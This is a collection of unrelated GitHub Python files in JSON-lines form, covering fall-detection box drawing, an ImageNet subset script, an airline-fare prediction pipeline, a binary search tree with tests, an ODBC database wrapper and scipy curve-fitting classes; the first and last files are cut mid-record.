classes == 1:\r\n for i in range(len(coordinate)):\r\n if coordinate[i][5] == 4 or coordinate[i][5] == 5 or coordinate[i][5] == 6 or coordinate[i][5] == 7:\r\n if coordinate[i][4] >= 0.85:\r\n result.append(coordinate[i])\r\n else:\r\n for i in range(len(coordinate)):\r\n if coordinate[i][5] == classes:\r\n if coordinate[i][4] >= 0.7:\r\n result.append(coordinate[i])\r\n\r\n return np.array(result)\r\n \r\ndef drawBbox(img, coordinate,total_channel, fall_coor):\r\n for coor in coordinate:\r\n try:\r\n person_id, x1, y1, x2, y2 = coor\r\n\r\n total_channel.append(int(person_id))\r\n total_channel = list(set(total_channel))\r\n if person_id in fall_coor:\r\n cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0,0,255), 1)\r\n cv2.putText(img,\"Falling\", (int(x1), int(y1)-5), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,0,0), 2)\r\n else:\r\n cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0,0,255), 1)\r\n \r\n except:\r\n x1,y1,x2,y2,_,_ = coor\r\n cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0,0,255), 1)\r\n cv2.putText(img,\"Falling\", (int(x1), int(y1)-5), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255,0,0), 2)\r\n\r\n\r\n return img, len(total_channel), total_channel\r\n \r\ndef NewDraw(img, coordinate, fall):\r\n for coor in coordinate:\r\n x1,y1,x2,y2,conf,classId = coor\r\n cv2.rectangle(img, (int(x1),int(y1)-90), (int(x2),int(y2)-90), color = (255,0,0), thickness = 2)\r\n\r\n for coor in fall:\r\n id, x1,y1,x2,y2 = coor\r\n cv2.rectangle(img, (int(x1),int(y1)-90), (int(x2),int(y2)-90), color = (0,0,255), thickness = 2)\r\n cv2.putText(img, \"Falling\", (int(x1), int(y1)-5), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2)\r\n\r\n return img\r\n\r\ndef openJson(filename):\r\n try:\r\n f = open(filename,'r')\r\n data = json.load(f)\r\n f.close()\r\n except JSONDecodeError:\r\n f.close()\r\n return \r\n return data\r\n\r\n\r\ndef timetoint(hour,minute,second):\r\n \r\n return ((hour*3600)+(minute*60)+second) \r\n\r\n","repo_name":"Aquos06/FDD_FIX","sub_path":"allutility/coorutil.py","file_name":"coorutil.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"73022287670","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom os import listdir\r\nfrom os.path import isfile, join, isdir\r\nimport numpy as np\r\n\r\nlePath = \"ILSVRC2014_DET_train\"\r\n\r\nsynsets = [d for d in listdir(lePath) if isdir(join(lePath,d))]\r\n\r\nsynsetDict = {syn: listdir(join(lePath, syn)) for syn in synsets}\r\n\r\nsynsetLen = np.array([len(k) for k in synsetDict.values()])\r\n\r\nusableSets = [syn for syn in synsets if len(synsetDict[syn])>=400]\r\n\r\nnp.random.seed(0)\r\nselectedSets = np.random.choice(usableSets, 100)\r\n\r\nwith open(\"ILSVRC2014_DET_train.txt\",'w') as outfile:\r\n for idx, syn in enumerate(list(selectedSets)):\r\n images = np.random.choice(synsetDict[syn],400)\r\n for image in images:\r\n outfile.writelines(join(syn, image) + '\\t' + \"{0}\".format(idx) + '\\n')\r\n","repo_name":"laura-rieger/max_switch_reconstruction_tunnel","sub_path":"dataset/ILSVRC2014_DET_train.py","file_name":"ILSVRC2014_DET_train.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70290777911","text":"import sys\nimport pandas as pd\nfrom ExceptionLoggerAndUtils.logger import App_Logger\nfrom ExceptionLoggerAndUtils.exception import CustomException\nfrom ExceptionLoggerAndUtils.utils import load_object\n\nclass PredictPipline():\n def __init__(self):\n pass\n\n def predict(self,features):\n try:\n modelPath = \"artifacts/model.pkl\"\n preprocessorPath = \"artifacts/transformation.pkl\"\n model = load_object(file_path=modelPath)\n transformation = load_object(file_path=preprocessorPath)\n dataScaled = transformation.transform(features)\n pred = model.predict(dataScaled)\n return pred\n except Exception as e:\n raise CustomException(e, sys)\n\n\n\nclass CustomData():\n def __init__(self,Airline:str,Date_of_Journey:str,Source:str,Destination:str,\n Dep_Time:str,Arrival_Time:str,Duration:str,Total_Stops:str):\n self.Airline = Airline\n self.Date_of_Journey = Date_of_Journey\n self.Source = Source\n self.Destination = Destination\n self.Dep_Time = Dep_Time\n self.Arrival_Time = Arrival_Time\n self.Duration = Duration\n self.Total_Stops = Total_Stops\n\n def getDataAsDataFrame(self):\n inputDict = {\n \"Airline\": [self.Airline],\n \"Date_of_Journey\": [self.Date_of_Journey],\n \"Source\": [self.Source],\n \"Destination\": [self.Destination],\n \"Dep_Time\": [self.Dep_Time],\n \"Arrival_Time\": [self.Arrival_Time],\n \"Duration\": [self.Duration],\n \"Total_Stops\": [self.Total_Stops]\n\n }\n\n return pd.DataFrame(inputDict)\n\n def changeDatatypeOfColumn(self,pred_df):\n date_format = \"%Y-%m-%d %H:%M:%S\"\n pred_df['Date_of_Journey'] = pd.to_datetime(pred_df['Date_of_Journey'], format=date_format)\n pred_df['Dep_Time'] = pd.to_datetime(pred_df['Dep_Time'], format=date_format)\n pred_df['Arrival_Time'] = pd.to_datetime(pred_df['Arrival_Time'], format=date_format)\n\n return pred_df\n\n def convertDateInToDayMonthYear(self, df):\n \"\"\" Written By : Shivraj Shinde//Version: 1.0//Revisions: None\n Description : This will create three different columns Day,Month,Year.\n Output : Return dataFrame with independant Column as Day,Month,Year Columns\n On Failure : Raise Exception\n \"\"\"\n try:\n df['Day'] = pd.to_datetime(df[\"Date_of_Journey\"], format=\"%Y-%m-%d\").dt.day\n df['Month'] = pd.to_datetime(df['Date_of_Journey'], format=\"%Y-%m-%d\").dt.month\n df['Year'] = pd.to_datetime(df['Date_of_Journey'], format=\"%Y-%m-%d\").dt.year\n\n return df\n\n except Exception as e:\n raise CustomException(e, sys)\n\n def isertValueInDuration(self, pred_df):\n pred_df['Duration'] = pred_df['Arrival_Time'] - pred_df['Dep_Time']\n #hours = str()\n Hours = pd.to_datetime(pred_df['Duration']).dt.hour\n Minutes = pd.to_datetime(pred_df['Duration']).dt.minute\n print(Hours)\n print(Hours)\n\n pred_df['Duration'] = pred_df['Duration'].astype(str)\n\n pred_df['Duration'] = str(Hours[0])+\"h \"+str(Minutes[0])+\"m\"\n\n #minutes =str(pd.to_datetime(pred_df['Duration']).dt.minute + \"m \")\n #pred_df['Duration'] =hours +\"h \"+minutes + \"m \"\n\n\n return pred_df\n\n def dropUncessaryColumns(self,df):\n try:\n df = df.drop([\"Arrival_Time\",\"Dep_Time\",\"Date_of_Journey\",\"Duration\"], axis = 1)\n return df\n except Exception as e:\n raise CustomException(e, sys)\n","repo_name":"AtharvaButala/AirlineFarePrediction1","sub_path":"Source/prediction/predictionPipline.py","file_name":"predictionPipline.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"41894404210","text":"getData = input()\ndata = getData.split(\",\")\ndemandFree = int(data[0]) # 此商品免費時的需求量\nsaleAdd = float(data[1]) # 對方商品漲 1 元時會增加的銷售量\ncost1 = int(data[2]) # 零售商 1 的商品成本\ncost2 = int(data[3]) # 零售商 2 的商品成本\niterationNum = int(data[4]) # 雙方共互動 n 輪\n\nr1_decisionList = []\nr2_decisionList = []\nr1_begin = (demandFree + cost1) / 2 # 零售商 1 第 0 輪決策\nr2_begin = (demandFree + saleAdd * r1_begin + cost2) / 2 # 零售商 2 第 0 輪決策\nr1_decisionList.append(r1_begin)\nr2_decisionList.append(r2_begin)\n\nfor i in range(iterationNum): # 零售商 2 根據零售商 1 的決策行動,共進行 n 輪\n r1_decision = (demandFree + saleAdd * r2_decisionList[-1] + cost1) / 2\n r1_decisionList.append(r1_decision)\n r2_decision = (demandFree + saleAdd * r1_decisionList[-1] + cost2) / 2\n r2_decisionList.append(r2_decision)\n\nEq1 = r1_decisionList[-1]\nEq2 = r2_decisionList[-1]\nprint(\"%0.2f %0.2f\" % (Eq1, Eq2)) # 最後的equilibrium情形","repo_name":"kevin900804/Programming_for_Business_Computing_in_Python_HW","sub_path":"用Python做商管程式設計(三)_價格競爭.py","file_name":"用Python做商管程式設計(三)_價格競爭.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"42270041055","text":"import torch\nfrom torch.utils.data import DataLoader\nimport pytorch_lightning as pl\nfrom distill_ai.modules import LogitsDistillationModule\n\n\nclass KnowledgeDistillationTrainer(pl.Trainer):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def fit(\n self,\n teacher_model: torch.nn.Module,\n student_model: torch.nn.Module,\n train_dataloader: DataLoader,\n val_dataloader: DataLoader,\n student_target_loss: torch.nn.Module,\n distillation_loss: torch.nn.Module,\n optimizer: torch.optim.Optimizer = torch.optim.Adam,\n *args,\n **kwargs,\n ):\n distillation_module = LogitsDistillationModule(\n teacher_model=teacher_model,\n student_model=student_model,\n distillation_loss=distillation_loss,\n student_target_loss=student_target_loss,\n optimizer=optimizer,\n *args,\n **kwargs,\n )\n super().fit(\n distillation_module, train_dataloaders=train_dataloader, val_dataloaders=val_dataloader, *args, **kwargs\n )\n","repo_name":"samirsalman/distillai","sub_path":"distill_ai/trainers/distillation_trainer.py","file_name":"distillation_trainer.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"19514801260","text":"#!python3\r\n\r\n\"\"\"\r\nBinary Search Tree. With Hibbard's deletion. Not balanced.\r\n\"\"\"\r\n\r\nimport unittest\r\n\r\n\r\nclass Node(object):\r\n def __init__(self, key, left=None, right=None):\r\n self.key = key\r\n self.left = left\r\n self.right = right\r\n\r\n\r\nclass BST:\r\n def __init__(self, root=None):\r\n self.root = root\r\n\r\n def put(self, key):\r\n self.root = self._put(self.root, key)\r\n\r\n def _put(self, x, key):\r\n if x is None:\r\n return Node(key)\r\n if key < x.key:\r\n x.left = self._put(x.left, key)\r\n elif x.key < key:\r\n x.right = self._put(x.right, key)\r\n else:\r\n x.key = key\r\n return x\r\n\r\n def inorder(self, n=None):\r\n if not n:\r\n n = self.root\r\n if n.left:\r\n yield from self.inorder(n.left)\r\n yield n.key\r\n if n.right:\r\n yield from self.inorder(n.right)\r\n\r\n def preorder(self, n=None):\r\n if not n:\r\n n = self.root\r\n if not n:\r\n return None\r\n yield n.key\r\n if n.left:\r\n yield from self.preorder(n.left)\r\n if n.right:\r\n yield from self.preorder(n.right)\r\n\r\n def __repr__(self):\r\n r = []\r\n def printer(lvl, n):\r\n if not n:\r\n return\r\n if n.right:\r\n printer(lvl+1, n.right)\r\n r.append((' ' * lvl) + str(n.key))\r\n if n.left:\r\n printer(lvl+1, n.left)\r\n printer(0, self.root)\r\n return ''\r\n\r\n def delete(self, key):\r\n self.root = self._delete(self.root, key)\r\n\r\n def _delete(self, n, key):\r\n \"\"\" Hibbard's eager deletion \"\"\"\r\n if not n:\r\n return n\r\n if n.key > key:\r\n n.left = self._delete(n.left, key)\r\n return n\r\n elif n.key < key:\r\n n.right = self._delete(n.right, key)\r\n return n\r\n\r\n # Found. Delete:\r\n if not n.left and not n.right:\r\n n = None\r\n elif not n.left or not n.right:\r\n n = n.left or n.right\r\n else:\r\n # Has left and right.\r\n t = n\r\n n = self.min(t.right)\r\n n.right = self.delete_min(t.right)\r\n n.left = t.left\r\n return n\r\n\r\n def min(self, n=None):\r\n if not n:\r\n n = self.root\r\n while n.left:\r\n n = n.left\r\n return n\r\n\r\n def delete_min(self, n):\r\n if n and n.left:\r\n n.left = self.delete_min(n.left)\r\n return n\r\n return n.right if n else None\r\n\r\n\r\nclass Tests(unittest.TestCase):\r\n def test_deletion(self):\r\n \"\"\"\r\n 5\r\n 2 7\r\n 1 3 6 10\r\n 9 11\r\n \"\"\"\r\n bst = BST()\r\n preorder = [5, 2, 1, 3, 7, 6, 10, 9, 11]\r\n for v in preorder:\r\n bst.put(v)\r\n self.assertEqual(list(bst.preorder()), preorder)\r\n bst.delete(7)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3, 9, 6, 10, 11], repr(bst))\r\n bst.delete(9)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3, 10, 6, 11], repr(bst))\r\n bst.delete(10)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3, 11, 6], repr(bst))\r\n bst.delete(11)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3, 6], repr(bst))\r\n bst.delete(6)\r\n self.assertEqual(list(bst.preorder()), [5, 2, 1, 3], repr(bst))\r\n bst.delete(2)\r\n self.assertEqual(list(bst.preorder()), [5, 3, 1], repr(bst))\r\n bst.delete(3)\r\n self.assertEqual(list(bst.preorder()), [5, 1], repr(bst))\r\n bst.delete(5)\r\n self.assertEqual(list(bst.preorder()), [1], repr(bst))\r\n bst.delete(1)\r\n self.assertEqual(list(bst.preorder()), [], repr(bst))\r\n bst.delete(1)\r\n bst.delete(1)\r\n\r\n\r\nunittest.main()\r\n","repo_name":"artkpv/code-dojo","sub_path":"_algos/ds/bst/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"31420727676","text":"from unittest import TestCase\n\nfrom HzzProlog.HzzProlog import HzzProlog\nfrom HzzProlog.PrologCallable import define_parameterized_predicate\nfrom HzzProlog.test_util import remove_trailing_false_or_true\nfrom definitions.builtin_predicates import member\nfrom definitions.paths import TIME_PROCESSING_UTILITIES_PL_PATH\nfrom definitions.predicates import unique_call\nfrom definitions.variables import X, Result, _, Y, Y1, X1\nfrom tests.testing_utils.get_list_from_list_of_dicts import get_list_from_list_of_dicts\n\nfact = define_parameterized_predicate(\"fact\")\n\n\n\nclass TestUniqueCall(TestCase):\n def setUp(self) -> None:\n self.prolog = HzzProlog(TIME_PROCESSING_UTILITIES_PL_PATH)\n\n\n def test__should_be_able_to_handle_zero_result(self):\n result = self.prolog.query(unique_call(\n X, member(X, []), Result\n ))\n result = remove_trailing_false_or_true(result)\n result = get_list_from_list_of_dicts(result, \"Result\")\n self.assertCountEqual([], result)\n\n def test__should_not_alter_any_single_result(self):\n result = self.prolog.query(unique_call(\n X, member(X, [1]), Result\n ))\n result = remove_trailing_false_or_true(result)\n result = get_list_from_list_of_dicts(result, \"Result\")\n self.assertCountEqual([1], result)\n\n def test__should_remove_duplication_from_the_original_call(self):\n result = self.prolog.query(unique_call(\n X, member(X, [1, 1]), Result\n ))\n result = remove_trailing_false_or_true(result)\n result = get_list_from_list_of_dicts(result, \"Result\")\n self.assertCountEqual([1], result)\n\n def test__should_remove_duplication_from_the_original_call__preserve_distinct_values(self):\n result = self.prolog.query(unique_call(\n X, member(X, [1, 1, 2, 2, 3, 3]), Result\n ))\n result = remove_trailing_false_or_true(result)\n result = get_list_from_list_of_dicts(result, \"Result\")\n self.assertCountEqual([1, 2, 3], result) # don't care order\n\n def test__should_remove_duplication_from_the_original_call__multiple_param_at_once(self):\n self.prolog.add_facts('hzztime_defintitions', [\n fact(1, 2, 3),\n fact(0, 2, 3),\n fact(1, 2, 4),\n fact(0, 2, 4),\n fact(1, 3, 2),\n fact(0, 3, 4),\n fact(1, 3, 4),\n ])\n result = self.prolog.query(unique_call(\n [X, Y],\n fact(_, X, Y),\n [X1, Y1]\n ), print_query=True)\n result = remove_trailing_false_or_true(result)\n self.assertCountEqual([\n {'X1': 2, 'Y1': 3},\n {'X1': 2, 'Y1': 4},\n {'X1': 3, 'Y1': 2},\n {'X1': 3, 'Y1': 4},\n ], result) # don't care order\n","repo_name":"Hzzkygcs/heizscheduler-prolog","sub_path":"python/tests/time_processing_utilities/UniqueCall_test.py","file_name":"UniqueCall_test.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24382493400","text":"# Interface to a database connected via ODBC\n\nimport pyodbc\nfrom .db_int import DatabaseInterface\n\n\nclass DatabaseInterfaceOdbc(DatabaseInterface):\n\n def __init__(self, dsn, logger):\n super().__init__(logger)\n self._conn = pyodbc.connect(f\"DSN={dsn}\", autocommit=True)\n\n def execute(self, script, params=None, returnrs=False, fetchone=False):\n if self._logger:\n self._logger.debug(f\"script: {script}\")\n cursor = self._conn.cursor()\n if params:\n self._logger.debug(f\"params: {params}\")\n rs = cursor.execute(script, params)\n else:\n rs = cursor.execute(script)\n\n if fetchone:\n return rs.fetchone() is not None\n\n if returnrs:\n return rs\n\n def query(self, script, params=None):\n rs = self.execute(script, params, returnrs=True)\n l = []\n cols = [e[0] for e in rs.description]\n for row in rs:\n d = dict(zip(cols, row))\n l.append(d)\n return l\n\n def find(self, dbtype):\n dbtype.set_private_fields()\n script, params = dbtype.get_select_clause()\n return self.execute(script, params, fetchone=True)\n\n def delete(self, dbtype):\n dbtype.set_private_fields()\n script, params = dbtype.get_delete_clause()\n self.execute(script, params)\n\n def store(self, dbtype):\n if self.find(dbtype):\n script, params = dbtype.get_update_clause()\n else:\n script, params = dbtype.get_insert_clause()\n self.execute(script, params)\n\n\n def create(self, dbtype):\n raise NotImplementedError\n","repo_name":"sanjayrisbud/py-scrape","sub_path":"framework/db_odbc.py","file_name":"db_odbc.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5131382021","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import chisquare\nfrom scipy.stats import chi2\n\n\n\n\nclass fitting(object):\n def __call__(self, data, bins, fit_func, guess):\n self.guess = guess\n self.bins = bins\n self.data = data\n self.fit_func = fit_func\n # Histogram\n self.hist, self.bin_edges = np.histogram(self.data, bins=self.bins)\n self.bin_centers = (self.bin_edges[:-1] + self.bin_edges[1:])/2\n\n # Fitting function call\n try:\n self.coeff, self.var_matrix = curve_fit(self.fit_func, self.bin_centers,\n self.hist, p0=self.guess)\n self.perr = np.sqrt(np.absolute(np.diag(self.var_matrix)))\n # Error in parameter estimation\n except:\n print(\"Fitting Problems\")\n self.coeff = np.array(self.guess)\n self.perr = np.array(self.guess)\n #Gets fitted function and residues\n self.hist_fit = self.fit_func(self.bin_centers, *self.coeff)\n self.xi2, self.p = chisquare(f_obs=self.hist,f_exp=self.hist_fit)\n\n def evaluate(self,in_data):\n return self.fit_func(in_data,*self.coeff)\n\n\nclass fitting_nohist(object):\n def __call__(self, data, time, fit_func, guess, method, bounds):\n self.bins = time\n self.data = data\n self.fit_func = fit_func\n self.guess = guess\n\n # Fitting function call\n try:\n if (method=='lm'):\n self.coeff, self.var_matrix = curve_fit(self.fit_func, self.bins,\n self.data, p0=self.guess,\n method=method)\n self.perr = np.sqrt(np.absolute(np.diag(self.var_matrix)))\n self.fit = self.fit_func(self.bins, *self.coeff)\n self.r_sqr = self.R_square()\n else:\n self.coeff, self.var_matrix = curve_fit(self.fit_func, self.bins,\n self.data, p0=self.guess,\n method=method,\n bounds=bounds)\n self.perr = np.sqrt(np.absolute(np.diag(self.var_matrix)))\n self.fit = self.fit_func(self.bins, *self.coeff)\n self.r_sqr = self.R_square()\n #Gets fitted function and R_square value for GOF\n\n # Error in parameter estimation\n except:\n print(\"Fitting Problems\")\n self.coeff = np.zeros(len(self.guess))\n self.perr = np.ones(len(self.guess))*np.Inf\n self.r_sqr = 1E6\n\n\n def evaluate(self,in_data):\n return self.fit_func(in_data,*self.coeff)\n\n def R_square(self):\n # WARNING: R^2 Lineal\n ss_res = np.sum((self.data-self.fit)**2)\n ss_tot = np.sum((self.data-np.mean(self.data))**2)\n return 1-(ss_res / ss_tot)\n\n\n\nclass gompertz(fitting_nohist):\n\n def Gomp_n(self,x, n, *param):\n def Gomp(x, *param_inner):\n return (param_inner[0]/(1.0+np.exp(((x**2.0)-(param_inner[1]**2.0))*param_inner[2])))\n aux=np.zeros(len(x))\n for i in range(n):\n param_inner = [i for i in param[i*3+1:(i+1)*3+1]]\n aux = aux + Gomp(x,*param_inner)\n return aux + param[0]\n\n def __call__(self, data, time, n, p0, method, bounds):\n def G_aux(x,*param):\n return self.Gomp_n(x,n,*param)\n # lambda x,*param: self.Gompertz(x,n,*param)\n super(gompertz,self).__call__( data=data,\n time=time,\n fit_func= G_aux,\n guess=p0,\n method = method,\n bounds = bounds)\n if len(self.coeff)>0:\n # Sort coefficients by alfa frequency\n alfa_f_array = self.coeff[2::3]\n order = np.argsort(alfa_f_array)\n order_full = np.concatenate([[i*3+2-1,i*3+2,i*3+2+1] for i in order], axis=0)\n self.coeff = np.concatenate([[self.coeff[0]],self.coeff[order_full]], axis=0)\n\n def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n axis.plot(self.data, self.bins, align='mid', facecolor='green', edgecolor='white', linewidth=0.5)\n # axis.set_xlabel(xlabel)\n # axis.set_ylabel(ylabel)\n # axis.set_title(title)\n # if (fit==True):\n # axis.plot(self.bin_centers, self.hist_fit, 'r--', linewidth=1)\n # if (res==True):\n # axis.text(0.95,0.95, (('$\\mu$=%0.3f (+/- %0.3f) \\n'+\\\n # '$\\sigma$=%0.3f (+/- %0.3f) \\n'+\n # 'FWHM=%0.3f (+/- %0.3f) \\n'+\\\n # 'Res=%0.3f%% (+/- %0.3f) \\n'+\\\n # 'chi2=%0.3f \\n'+'chi2inv_95=%0.3f \\n'+\\\n # 'p=%0.3f') % \\\n # (self.coeff[1] , self.perr[1],\n # np.absolute(self.coeff[2]) , self.perr[2],\n # 2.35*np.absolute(self.coeff[2]),\n # 2.35*np.absolute(self.perr[2]),\n # 2.35*np.absolute(self.coeff[2])*100/self.coeff[1],\n # 2.35*np.absolute(self.coeff[2])*100/self.coeff[1]*\n # np.sqrt((self.perr[2]/self.coeff[2])**2+\n # (self.perr[1]/self.coeff[1])**2),\n # self.xi2,\n # chi2.ppf(0.95,len(self.bin_centers)-2-1),\n # self.p\n # )\n # ),\n # fontsize=8,\n # verticalalignment='top',\n # horizontalalignment='right',\n # transform=axis.transAxes)\n #\n #\n # else:\n # # No resolution calculation\n # axis.text(0.95,0.95, (('$\\mu$=%0.3f (+/- %0.3f) \\n'+\\\n # '$\\sigma$=%0.3f (+/- %0.3f) \\n'+\n # 'FWHM=%0.3f (+/- %0.3f) \\n'+\\\n # 'chi2=%0.3f \\n'+'chi2inv_95=%0.3f \\n'+\\\n # 'p=%0.3f') % \\\n # (self.coeff[1], self.perr[1],\n # np.absolute(self.coeff[2]), self.perr[2],\n # 2.35*np.absolute(self.coeff[2]),\n # 2.35*np.absolute(self.perr[2]),\n # self.xi2,\n # chi2.ppf(0.95,len(self.bin_centers)-2-1),\n # self.p)),\n # fontsize=8,\n # verticalalignment='top',\n # horizontalalignment='right',\n # transform=axis.transAxes)\n\n\nclass double_exp_fit(fitting_nohist):\n\n def double_exp(x, *param):\n alfa = 1.0/param[1]\n beta = 1.0/param[0]\n t_p = np.log(beta/alfa)/(beta-alfa)\n K = (beta)*np.exp(alfa*t_p)/(beta-alfa)\n f = param[2]*K*(np.exp(-(x-param[3])*alfa)-np.exp(-(x-param[3])*beta))\n f[f<0] = 0\n return f\n\n def __call__(self, data, time, guess):\n # First guess\n super(double_exp_fit,self).__call__(data=data,\n time=time,\n fit_func=self.double_exp,\n guess=guess)\n\n def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n #axis.hist(self.data, self.bins, align='mid', facecolor='green', edgecolor='white', linewidth=0.5)\n axis.set_xlabel(xlabel)\n axis.set_ylabel(ylabel)\n axis.set_title(title)\n if (fit==True):\n axis.plot(self.bins, self.fit, 'r--', linewidth=1)\n axis.text(0.95,0.95, (('tau2=%0.3f (+/- %0.3f) \\n'+\\\n 'tau1=%0.3f (+/- %0.3f) \\n'+\n 'A=%0.3f (+/- %0.3f) \\n'+\\\n 't0=%0.3f (+/- %0.3f)') % \\\n (self.coeff[0] , self.perr[0],\n self.coeff[1] , self.perr[1],\n self.coeff[2] , self.perr[2],\n self.coeff[3] , self.perr[3]\n )\n ),\n fontsize=8,\n verticalalignment='top',\n horizontalalignment='right',\n transform=axis.transAxes)\n\nclass Ddouble_exp_fit(fitting_nohist):\n\n def Ddouble_exp(x, *param):\n alfa1 = 1.0/param[1]\n beta1 = 1.0/param[0]\n t_p1 = np.log(beta1/alfa1)/(beta1-alfa1)\n K1 = (beta1)*np.exp(alfa1*t_p1)/(beta1-alfa1)\n f1 = param[2]*K1*(np.exp(-(x-param[3])*alfa1)-np.exp(-(x-param[3])*beta1))\n f1[f1<0] = 0\n\n alfa2 = 1.0/param[5]\n beta2 = 1.0/param[4]\n t_p2 = np.log(beta2/alfa2)/(beta2-alfa2)\n K2 = (beta2)*np.exp(alfa2*t_p2)/(beta2-alfa2)\n f2 = param[6]*K2*(np.exp(-(x-param[7])*alfa2)-np.exp(-(x-param[7])*beta2))\n f2[f2<0] = 0\n\n return f1+f2\n\n def __call__(self, data, time, guess):\n # First guess\n super(Ddouble_exp_fit,self).__call__(data=data,\n time=time,\n fit_func=self.Ddouble_exp,\n guess=guess)\n\n def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n #axis.hist(self.data, self.bins, align='mid', facecolor='green', edgecolor='white', linewidth=0.5)\n axis.set_xlabel(xlabel)\n axis.set_ylabel(ylabel)\n axis.set_title(title)\n if (fit==True):\n axis.plot(self.bins, self.fit, 'r--', linewidth=1)\n axis.text(0.95,0.95, (('tau2_a=%0.3f (+/- %0.3f) \\n'+\n 'tau1_a=%0.3f (+/- %0.3f) \\n'+\n 'A_a=%0.3f (+/- %0.3f) \\n'+\n 't0_a=%0.3f (+/- %0.3f) \\n'+\n 'tau2_b=%0.3f (+/- %0.3f) \\n'+\n 'tau1_b=%0.3f (+/- %0.3f) \\n'+\n 'A_b=%0.3f (+/- %0.3f) \\n'+\n 't0_b=%0.3f (+/- %0.3f)') % \\\n (self.coeff[0] , self.perr[0],\n self.coeff[1] , self.perr[1],\n self.coeff[2] , self.perr[2],\n self.coeff[3] , self.perr[3],\n self.coeff[4] , self.perr[4],\n self.coeff[5] , self.perr[5],\n self.coeff[6] , self.perr[6],\n self.coeff[7] , self.perr[7]\n )\n ),\n fontsize=8,\n verticalalignment='top',\n horizontalalignment='right',\n transform=axis.transAxes)\n\nclass GND_fit(fitting):\n\n def GND(x, *param):\n # Generalized normal distribution\n # param[0]=ALFA | param[1]=BETA | param[2]=GAMMA | param[3]=MU\n return (param[1]/(2*param[0]*param[2]*(1/param[1]))) * \\\n np.exp(-(np.abs(x-param[3])/param[0])**param[1])\n\n def __call__(self, data, bins):\n self.p0 = [np.std(data), 1, 1, np.mean(data)]\n # First guess\n if len(bins)>1:\n super(GND_fit,self).__call__(data=data,\n bins=bins,\n guess=self.p0,\n fit_func=self.GND)\n\n def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n axis.hist(self.data, self.bins, align='mid', facecolor='green')\n axis.set_xlabel(xlabel)\n axis.set_ylabel(ylabel)\n axis.set_title(title)\n if (fit==True):\n axis.plot(self.bin_centers, self.hist_fit, 'r--', linewidth=1)\n if (res==True):\n mu = self.coeff[3]; mu_err = self.perr[3]\n sigma = self.coeff[0]*np.sqrt(3) ; sigma_err = np.sqrt(3)*self.perr[0]\n\n # Wikipedia\n # NOTE:Try to include CHI_SQUARE\n half_p_dx = self.bin_centers[np.abs(self.hist_fit.astype('float') - np.max(self.hist_fit).astype('float')/2).argmin()] \\\n - self.bin_centers[np.abs(self.hist_fit.astype('float') - np.max(self.hist_fit).astype('float')).argmin()]\n FWHM = 2*half_p_dx\n\n axis.text(0.95,0.95, (('$\\mu$=%0.2f (+/- %0.2f) \\n'+\\\n '$\\sigma$=%0.2f (+/- %0.2f) \\n' +\\\n 'FWHM=%0.2f (+/- %0.2f)') %\n (mu , mu_err,\n np.absolute(sigma) , sigma_err,\n FWHM, 2.35*sigma_err\n )\n ),\n fontsize=8,\n verticalalignment='top',\n horizontalalignment='right',\n transform=axis.transAxes)\n\nclass gauss_fit(fitting):\n\n def gauss(x, *param):\n return param[0] * np.exp(-(x-param[1])**2/(2.*param[2]**2))\n\n def __call__(self, data, bins):\n\n self.p0 = [1, np.mean(data), np.std(data)]\n # First guess\n xi2_vec=[]\n if isinstance(bins,list):\n bin_range = np.arange(bins[0],bins[1]+1)\n for i in bin_range:\n super(gauss_fit,self).__call__(data=data,\n bins=i,\n guess=self.p0,\n fit_func=self.gauss1)\n xi2_vec.append(self.xi2)\n argmin_xi2 = np.argmin(xi2_vec)\n\n super(gauss_fit,self).__call__(data=data,\n bins=bin_range[argmin_xi2],\n guess=self.p0,\n fit_func=self.gauss)\n else:\n super(gauss_fit,self).__call__(data=data,\n bins=bins,\n guess=self.p0,\n fit_func=self.gauss1)\n\n def plot(self,axis,title,xlabel,ylabel,res=True,fit=True):\n axis.hist(self.data, self.bins, align='mid', facecolor='green', edgecolor='white', linewidth=0.5)\n axis.set_xlabel(xlabel)\n axis.set_ylabel(ylabel)\n axis.set_title(title)\n if (fit==True):\n axis.plot(self.bin_centers, self.hist_fit, 'r--', linewidth=1)\n if (res==True):\n axis.text(0.95,0.95, (('$\\mu$=%0.3f (+/- %0.3f) \\n'+\\\n '$\\sigma$=%0.3f (+/- %0.3f) 